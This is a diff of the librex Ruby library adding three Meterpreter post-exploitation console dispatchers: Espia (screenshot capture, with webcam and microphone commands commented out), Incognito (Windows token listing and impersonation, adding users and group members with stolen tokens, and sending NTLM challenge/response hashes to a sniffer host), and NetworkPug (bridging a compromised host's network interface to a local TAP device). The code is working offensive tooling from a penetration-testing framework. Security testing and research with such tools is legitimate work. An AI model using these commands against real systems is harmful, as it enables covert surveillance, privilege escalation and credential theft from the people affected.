librex 0.0.20 → 0.0.21

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb

@@ -0,0 +1,108 @@
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Espia - Capture audio, video, screenshots from the remote system
+#
+###
+class Console::CommandDispatcher::Espia
+
+	Klass = Console::CommandDispatcher::Espia
+
+	include Console::CommandDispatcher
+
+	#
+	# Initializes an instance of the espia command interaction.
+	#
+	def initialize(shell)
+		super
+	end
+
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+	#		"dev_image"  => "Attempt to grab a frame from webcam",
+	#		"dev_audio"  => "Attempt to record microphone audio",
+			"screengrab" => "Attempt to grab screen shot from process's active desktop"
+		}
+	end
+
+	def cmd_dev_image()
+		client.espia.espia_video_get_dev_image()
+		print_line("[*] Done.")
+
+		return true
+	end
+
+	def cmd_dev_audio(*args)
+		maxrec = 60
+
+		if (args.length < 1)
+			print_line("Usage: dev_audio <rec_secs>\n")
+			print_line("Record mic audio\n")
+			return true
+		end
+
+		secs = args[0].to_i
+		if secs  > 0 and secs <= maxrec
+			milsecs = secs*1000
+			print_line("[*] Recording #{milsecs} miliseconds.\n")
+			client.espia.espia_audio_get_dev_audio(milsecs)
+			print_line("[*] Done.")
+		else
+			print_line("[-] Error: Recording time 0 to 60 secs \n")
+		end
+
+		return true
+	end
+
+	#
+	# Grab a screenshot of the current interactive desktop.
+	#
+	def cmd_screengrab( *args )
+		if( args[0] and args[0] == "-h" )
+			print_line("Usage: screengrab <path.jpeg> [view in browser: true|false]\n")
+			print_line("Grab a screenshot of the current interactive desktop.\n")
+			return true
+		end
+		
+		show = true
+		show = false if (args[1] and args[1] =~ /^(f|n|0)/i)
+		
+		path = args[0] || Rex::Text.rand_text_alpha(8) + ".jpeg"
+		
+		data = client.espia.espia_image_get_dev_screen
+		
+		if( data )
+			::File.open( path, 'wb' ) do |fd|
+				fd.write( data )
+			end
+			path = ::File.expand_path( path )
+			print_line( "Screenshot saved to: #{path}" )
+			Rex::Compat.open_file( path ) if show
+		end
+		
+		return true
+	end
+
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"Espia"
+	end
+
+end
+
+end
+end
+end
+end
+

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb

@@ -0,0 +1,241 @@
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Privilege escalation extension user interface.
+#
+###
+class Console::CommandDispatcher::Incognito
+
+	Klass = Console::CommandDispatcher::Incognito
+
+	include Console::CommandDispatcher
+
+	#
+	# Initializes an instance of the priv command interaction.
+	#
+	def initialize(shell)
+		super
+	end
+
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"add_user" => "Attempt to add a user with all tokens",
+			"add_localgroup_user" => "Attempt to add a user to a local group with all tokens",
+			"add_group_user" => "Attempt to add a user to a global group with all tokens",
+			"list_tokens" => "List tokens available under current user context",
+			"impersonate_token" => "Impersonate specified token",
+			"snarf_hashes" => "Snarf challenge/response hashes for every token"
+		}
+	end
+
+
+	@@add_user_opts = Rex::Parser::Arguments.new(
+		"-h" => [ true,  "Add user to remote host" ])
+
+	@@add_localgroup_user_opts = Rex::Parser::Arguments.new(
+		"-h" => [ true,  "Add user to local group on remote host" ])
+
+	@@add_group_user_opts = Rex::Parser::Arguments.new(
+		"-h" => [ true,  "Add user to global group on remote host" ])
+
+	@@list_tokens_opts = Rex::Parser::Arguments.new(
+		"-u" => [ false,  "List tokens by unique username" ],
+		"-g" => [ false, "List tokens by unique groupname" ])
+
+	def cmd_list_tokens(*args)
+		token_order = -1
+
+		@@list_tokens_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-u"
+					token_order = 0
+				when "-g"
+					token_order = 1
+			end
+		}
+
+		if (token_order == -1)
+			print_line("Usage: list_tokens <list_order_option>\n")
+			print_line("Lists all accessible tokens and their privilege level")
+			print_line(@@list_tokens_opts.usage)
+			return
+		end
+
+		system_privilege_check
+
+		tokens = client.incognito.incognito_list_tokens(token_order)
+
+		print_line()
+		print_line("Delegation Tokens Available")
+		print_line("========================================")
+
+		tokens['delegation'].each_line { |string|
+			print(string)
+		}
+
+		print_line()
+		print_line("Impersonation Tokens Available")
+		print_line("========================================")
+
+		tokens['impersonation'].each_line { |string|
+			print(string)
+		}
+
+		print_line()
+
+		return true
+	end
+
+	def cmd_impersonate_token(*args)
+		if (args.length < 1)
+			print_line("Usage: impersonate_token <token>\n")
+			print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
+			print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
+			print_line("Hint: Enclose with quotation marks if name contains a space\n")
+			return
+		end
+
+		system_privilege_check
+		username = args[0]
+		client.incognito.incognito_impersonate_token(username).each_line { |string|
+			print(string)
+		}
+
+		return true
+	end
+
+	def cmd_add_user(*args)
+		# Default to localhost
+		host = "127.0.0.1"
+
+		@@add_user_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					host = val
+			end
+		}
+				
+		if (args.length < 2)
+			print_line("Usage: add_user <username> <password> [options]\n")
+			print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
+			print_line(@@add_user_opts.usage)
+			return
+		end
+
+		system_privilege_check
+
+		username = args[0]
+		password = args[1]
+
+		client.incognito.incognito_add_user(host, username, password).each_line { |string|
+			print(string)
+		}
+
+		return true
+	end
+
+	def cmd_add_localgroup_user(*args)
+		# Default to localhost
+		host = "127.0.0.1"
+
+		@@add_localgroup_user_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					host = val
+			end
+		}
+				
+		if (args.length < 2)
+			print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
+			print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
+			print_line(@@add_localgroup_user_opts.usage)
+			return
+		end
+
+		system_privilege_check
+
+		groupname = args[0]
+		username = args[1]
+
+		client.incognito.incognito_add_localgroup_user(host, groupname, username).each_line { |string|
+			print(string)
+		}
+
+		return true
+	end
+
+	def cmd_add_group_user(*args)
+		# Default to localhost
+		host = "127.0.0.1"
+
+		@@add_group_user_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					host = val
+			end
+		}
+				
+		if (args.length < 2)
+			print_line("Usage: add_group_user <groupname> <username> [options]\n")
+			print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
+			print_line(@@add_group_user_opts.usage)
+			return
+		end
+
+		system_privilege_check
+
+		groupname = args[0]
+		username = args[1]
+
+		client.incognito.incognito_add_group_user(host, groupname, username).each_line { |string|
+			print(string)
+		}
+
+		return true
+	end
+
+	def cmd_snarf_hashes(*args)
+		if (args.length < 1)
+			print_line("Usage: snarf_hashes <sniffer_host>\n")
+			print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
+			return
+		end
+
+		system_privilege_check
+
+		print_line("[*] Snarfing token hashes...")
+		client.incognito.incognito_snarf_hashes(args[0])
+		print_line("[*] Done. Check sniffer logs")
+		
+		return true
+	end
+
+	def system_privilege_check
+		if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
+			print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
+			print_line("             Call rev2self if primary process token is SYSTEM")
+		end
+	end
+
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"Incognito"
+	end
+
+end
+
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb

@@ -0,0 +1,231 @@
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+# Rex::Ui::Text::IrbShell.new(binding).run
+
+class Console::CommandDispatcher::NetworkPug
+
+	Klass = Console::CommandDispatcher::NetworkPug
+
+	include Console::CommandDispatcher
+
+	@@options = Rex::Parser::Arguments.new(
+		"-i" => [ true, "Interface on remote machine to listen on" ],
+		"-f" => [ true, "Additional pcap filtering mechanism" ],
+		"-v" => [ false, "Virtual NIC (packets only for your TAP dev locally)" ]
+	)
+
+	def initialize(shell)
+		@thread_stuff = nil
+		@tapdev = nil
+		@channel = nil
+
+		super
+	end
+
+	attr_accessor :thread_stuff
+	attr_accessor :tapdev
+	attr_accessor :channel
+
+
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"networkpug_start" => "Start slinging packets between hosts",
+			"networkpug_stop"  => "Stop slinging packets between hosts",
+		}
+	end
+
+	def setup_tapdev
+		# XXX, look at how to use windows equivilient and include
+
+		tapdev = ::File.open("/dev/net/tun", "wb+")
+
+		0.upto(16) { |idx|
+			name = "npug#{idx}"
+
+			ifreq = [ name, 0x1000 | 0x02, "" ].pack("a16va14")
+
+			begin
+				tapdev.ioctl(0x400454ca, ifreq)		# is there a better way than hex constant
+			rescue Errno::EBUSY
+				next
+			end
+			
+			ifreq = [ name ].pack("a32")
+
+			tapdev.ioctl(0x8927, ifreq)
+
+			# print_line(Rex::Text.hexify(ifreq))
+
+			mac = sprintf("%02x:%02x:%02x:%02x:%02x:%02x", ifreq[18], ifreq[19], ifreq[20], ifreq[21], ifreq[22], ifreq[23])
+
+			return tapdev, name, mac
+		}
+		
+		tapdev.close()
+		return nil, nil, nil
+	end
+
+	def proxy_packets()
+		while 1
+			# Ghetto :\
+
+			sd = Rex::ThreadSafe.select([ @channel.lsock, @tapdev ], nil, nil)
+
+			sd[0].each { |s|
+				if(s == @channel.lsock)	# Packet from remote host to local TAP dev
+					len = @channel.lsock.read(2)
+					len = len.unpack('n')[0]
+
+					#print_line("Got #{len} bytes from remote host's network")
+					
+					if(len > 1514 or len == 0)
+						@tapdev.close()
+						print_line("length is invalid .. #{len} ?, de-synchronized ? ")
+					end
+
+					packet = @channel.lsock.read(len)
+
+					print_line("packet from remote host:\n" + Rex::Text.hexify(packet))
+
+					@tapdev.syswrite(packet)
+
+				elsif(s == @tapdev)
+					# Packet from tapdev to remote host network
+
+					packet = @tapdev.sysread(1514)
+
+					print_line("packet to remote host:\n" + Rex::Text.hexify(packet))
+
+					@channel.write(packet)
+				end
+			} if(sd)
+
+			if(not sd)
+				print_line("hmmm. ")
+			end
+		end
+	end
+
+	def cmd_networkpug_start(*args)
+		# PKS - I suck at ruby ;\
+
+		virtual_nic = false
+		filter = nil
+		interface = nil
+
+		if(args.length == 0)
+			args.unshift("-h")
+		end
+
+		@@options.parse(args) { |opt, idx, val|
+			# print_line("before: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}")
+			case opt
+				when "-v"
+					virtual_nic = true
+
+				when "-f"
+					filter = val
+
+				when "-i"
+					interface = val
+
+				when "-h"
+					print_error("Usage: networkpug_start -i interface [options]")
+					print_error("")
+					print_error(@@options.usage)
+			end
+			# print_line("after: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}")
+
+		}
+
+		if (interface == nil)
+			print_error("Usage: networkpug_start -i interface [options]")
+			print_error("")
+			print_error(@@options.usage)
+			return
+		end
+
+		@tapdev, tapname, mac = setup_tapdev
+
+		if(@tapdev == nil)
+			print_status("Failed to create tapdev")
+			return
+		end
+
+		# PKS, we should implement multiple filter strings and let the
+		# remote host build it properly.
+		# not (our conn) and (virtual nic filter) and (custom filter)
+		# print_line("before virtual, filter is #{filter}")
+
+		if(filter == nil and virtual_nic == true)
+			filter = "ether host #{mac}"
+		elsif(filter != nil and virtual_nic == true)
+			filter += " and ether host #{mac}"
+			#print_line("Adjusted filter is #{filter}")
+		end
+
+		print_line("#{tapname} created with a hwaddr of #{mac}, ctrl-c when done")
+
+		response, @channel = client.networkpug.networkpug_start(interface, filter)
+
+		if(@channel)
+			@thread_stuff = Rex::ThreadFactory.spawn("MeterpreterNetworkPUGReceiver", false) {
+				proxy_packets()
+			}
+
+			print_line("Packet slinger for #{interface} has a thread structure of #{@thread_stuff}")
+		end
+
+		return true
+	end
+	
+	def cmd_networkpug_stop(*args)
+		interface = args[0]
+		if (interface == nil)
+			print_error("Usage: networkpug_stop [interface]")
+			return
+		end		
+
+		client.networkpug.networkpug_stop(interface)
+
+		#print_line("client.networkpug.networkpug_stop returned")
+
+		if(@thread_stuff)
+			# print_line("killing thread")
+			@thread_stuff.kill
+
+			#print_line("joining thread")
+			#@thread_stuff.join
+			# meterpreter dies if i try to join.. not sure why.
+
+			@thread_stuff = nil
+			
+			#print_line("closing tapdev")
+			@tapdev.close
+
+			#print_line("closing channel")
+			#@channel.close
+		end
+
+		print_status("Packet slinging stopped on #{interface}")
+		return true
+	end
+	
+	def name
+		"NetworkPug"
+	end
+
+end
+
+end
+end
+end
+end